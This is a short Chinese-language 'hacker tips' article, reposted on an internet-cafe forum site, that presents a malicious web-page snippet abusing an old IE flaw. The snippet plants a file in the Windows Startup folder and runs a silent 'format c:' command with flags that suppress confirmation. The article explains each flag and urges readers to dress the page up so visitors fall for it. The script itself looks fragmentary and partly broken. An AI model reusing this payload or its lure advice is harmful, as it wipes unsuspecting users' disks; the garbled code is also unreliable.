天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

黑客技巧之有关HTML代码的另类应用

2008-2-18黑客基地佚名

  这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

  现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

  我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

  下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

  scr.reset()
scr.path="c:\\windows\\start menu\\programs\\启动\\文件名
scr.doc=""
wsh.run('start.exe /m format c:/q/autotest/u')

  对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

  下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

  首先,我们来看看这一句

  scr.path="c:\\windows\\start menu\\programs\\启动\\文件名

  这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

  wsh.run('start.exe /m format c:/q/autotest/u')

  这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

  在这里我把他的一些参数,简要的说说,大家会更加明白的。

  在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

  在这段代码里,核心语句

  wsh.run('start.exe /m format c:/q/autotest/u')

  我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:黑客基地 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行